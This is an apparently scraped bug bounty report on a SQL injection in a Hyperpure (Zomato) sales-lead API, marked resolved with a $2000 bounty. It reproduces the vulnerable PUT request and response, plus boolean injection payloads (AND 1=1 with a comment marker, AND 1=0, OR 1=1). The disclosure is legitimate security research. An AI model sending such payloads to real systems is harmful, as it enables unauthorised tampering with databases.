Loading HuntDB...

SQL Injection in www.hyperpure.com

Critical
Z
Zomato
Submitted None
Reported by hoteyes

Vulnerability Details

Technical details and impact analysis

Code Injection
Vulnerable Request : PUT /consumer/onboarding/saleslead/6b6a8a5a-4a74-46db-b2fe-32a46f927ecc HTTP/1.1 Host: api.hyperpure.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 X-Client: consumer X-TrackingId: 8242c5a2-6325-4101-96b8-c7ed6008e92a HeaderRoute: v2 APIVersion: 4.2 AppType: web Content-Length: 246 Origin: https://www.hyperpure.com Connection: close Referer: https://www.hyperpure.com/register {"address":{"addressLine":"test","cityId":34,"state":{"name":"Gujarat"},"zipCode":"388001"},"deliveryTime":0,"email":"[email protected]","outletName":"test","phoneNumber":"█████","salesLeadId":"31cf8eb0-f81e-4c99-acad-35eae89ed659"} The above request is used to create sales lead with the data the sales lead id is produced and verified by the domain. Base Response Received: HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 68 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://www.hyperpure.com x-envoy-upstream-service-time: 166 Server: envoy Date: Thu, 26 Nov 2020 18:48:34 GMT Connection: close Vary: Accept-Encoding {"response":{"salesLeadId":"6b6a8a5a-4a74-46db-b2fe-32a46f927ecc"}} Now we will be executing following steps to verify if "AND " & "OR" statements work. 1) Proving AND condition working while using it with a valid sales id " AND 1 = "1 --+- 2) Proving AND condition false with working sales lead using AND 1=0. 3) Proving adding cool as a sales lead by using OR 1=1 , which always states true. ## Impact Adding random sales ID in the database using PUT statement and populating it.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$2000.00

Submitted

Weakness

Code Injection